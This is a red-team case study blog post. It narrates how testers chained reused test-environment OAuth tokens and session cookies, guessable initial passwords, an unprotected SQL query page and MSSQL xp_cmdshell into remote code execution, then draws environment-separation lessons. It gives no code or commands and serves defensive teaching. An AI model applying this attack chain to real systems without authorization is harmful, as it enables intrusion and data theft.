How Can A Lack Of Environment Separation Led Our Red Team to Remote Code Execution

Lack of Separation between Testing and Production environments is something we see often during our Red Team operations, and Penetration Testing assessments, and its something that that we regularly report to our customers, however it is an issue that doesn’t always get the attention it deserves.. This case study offers insights into one such scenario and will showcase how we were able to exploit a lack of environment separation into a remote code execution on one of our client’s web servers.

What is Environment Separation?

The concept of environment separation refers to the practice of ensuring distinct boundaries between different computing environments, such as development, testing, and production. This classification acts as a safeguard to prevent inadvertent data leaks, software bugs, or malicious code from transitioning from one environment to another, it is in essence a defense-in-depth strategy that can contain an attacker’s impact. For instance, a vulnerability introduced to a development server could be inadvertently cause production environment to be at risk.

Environment separation goes a few steps beyond just making sure our testing applications and production applications are on different servers. Security best practices suggests (and so do we) that the separation includes separation cloud environments into different accounts, different administrative access (i.e the admin credentials for testing environment should be different than the admin credentials for production), and perhaps the most common mistake organization make is the lack of separation of secrets such as cryptographic keys and access tokens.

Lets mix our environments what could possibly go wrong?

Our story begins in a Red Team engagement that we conducted for a large scale customer in the transportation sector. The client gave us a very wide scope containing a few hundred assets (IPs and subdomains). The Rules of Engagement were that everything, except phishing and physical access is allowed (and obviously things like DoS are off the table). With that in mind we began our Red Team operation with some recon.

Note – the names, addresses and some information in this test case were altered to avoid exposing sensitive information

Our recon phase led us to a few interesting web applications that, judging by their tech stack, looked quite old, and possibly vulnerable, so we decided to target those first. We quickly realized that one of the web application’s admin panel was accessible with guessable credentials. After gaining initial access to the admin panel, we learned that this web application stored documentation about how to access REST APIs of other services (that are in scope). The information included descriptions of the APIs and a few OAuth 2.0 access tokens. But alas, when we managed to pull user data using the API, by invoking some of these APIs we saw that we are accessing data belonging to a testing environment, containing only usernames like [email protected]. It turned out the documentation was about services that are currently in development or testing environments, so the information was quite useless… or was it?

If you have experience with hacking systems (or you just read the title), then you can probably see where we are going with this. After coming to a dead end with the testing usernames we found, we decided to try to target those same REST APIs, but on the production system. The problem was, that we only had access tokens to the testing environment. We didn’t have a better lead so we thought to try the the access tokens on the production system. We proceeded to invoke the method /app/listUsers on the domain prodrest.target.com (production) by simply changing the HTTP request from testrest.target.com (testing), with the same access token that working on the testing environment. To our amazement, this worked on our first try and we managed to pull a bunch of production usernames!

Expanding Our Access

After some poking and prodding we discovered to which web application those downloaded users belonged to. Turns out the users belong to a ticketing system for employees only on ticketing.target.com We also found out that new users have a guessable initial password, that needs to changed on the initial login. Combining these two together we were able to discover a few users that never performed an initial login. So, with the help of a few custom written tools, we managed to guess their initial password and login on their behalf – a risky move, but we had good indications that the system will not alert anyone about the logins (we also had a pre-approval to do this).

At this point we already had a significant accomplishment – we had several users to the employee-only ticket web application. Our Penetration Testing background taught us that systems that are designed to be internally facing only, i.e only accessible to the company’s employees, are usually less secure than their publicly facing counterparts, and can be filled with the security vulnerabilities. This is usually because organizations have a higher trust in their employees, and the organization assumes that the risk from these “internal” systems is negligible. That means that these systems are not regularly (if ever) tested for vulnerabilities.

We logged in into the web application as one of the stolen users, and began looking for vulnerabilities. After careful inspection of the JavaScript files, we managed to identify an intriguing, hidden ASPX file called query.aspx. The page, as the name suggests, allows admins to send arbitrary SQL queries to the database by design, but when we tested the feature (which was lacking access restrictions), we were disheartened to discover that the functionality was disabled.

Most hackers would probably spend a few hours/days finding other vulnerabilities on the ticketing website, but sometimes a better method is to take a step back, take a deep breath, think about what mistakes IT teams and developer make, and think holistically and creatively about the problem.

Lack of Separation strikes again!

We knew by now that the organization likes to keep a testing version for each web application, so maybe in the testing version of ticketing web application, the query.apsx page isn’t disabled? But, there is an obstacle, we don’t have users to the testing environment…unless…unless both environments are using the same cryptographic material to generate their session cookies? If so, we might be able to use our working session cookie from the production web app on the testing web app.

So we took our HTTP request, containing a request to query.aspx from Burp, with the payload as-is, changed only the Host HTTP header and retargeted it against the testing environment version of the ticketing website (tst-ticketing.target.com)- IT WORKED! we confirmed that we have access to the web application on both the testing and production using the same cookie, and that query.aspx wasn’t disabled on the testing environment! Using the SQL querying functionality we managed to find some sensitive internal information, but the icing on the cake was that the MSSQL on the testing environment was misconfiguration to allow xp_cmdshell. In other words, it allowed us to send OS level commands through the querying service and to gain remote code execution on the target.

So to sum up we were able to chain the following vulnerabilities in order to gain RCE

  1. Default credentials on the documentation website.
  2. Plaintext secrets in the documentation websites (OAuth 2.0 access tokens)
  3. Shared access tokens between testing and production sites (on the REST API)
  4. Guessable initial user passwords for the ticketing website.
  5. Shared cryptographic material between testing and production sites (for the ticketing web apps)
  6. Dangerous SQL functionality running on the web server (query.aspx)
  7. missing authorization on query.aspx
  8. Improperly hardened MSSQL (allows xp_cmdshell)

Final thoughts

  1. While this attack scenario seems unique, our experience tell us that this pattern of attack is quite common and is often how organization get compromised. The pattern in high level is this:
    1. Attacker gains some limited access to an obscure system (something the organization’s security isn’t paying much attention too).
    2. attacker chains this access together with some other vulnerability they discover to elevate their privileges.
    3. Attacker moves latterly and horizontally to gain access to more systems and more information.
    4. Repeat this process until the organization is compromised
    5. Profit
  2. This test case shows the real-world impact of exploiting the lack of environment separation, something that a lot of organizations only partially do, or sometimes entirely neglect. If, in this case, the OAuth 2.0 access tokens were not shared between the testing and production REST services, our Red Team operation might have been forced to find another route in.
  3. While it is understandable that an internal, employee only web app, gets less attention from security teams, it is vital that security assessments will still being performed.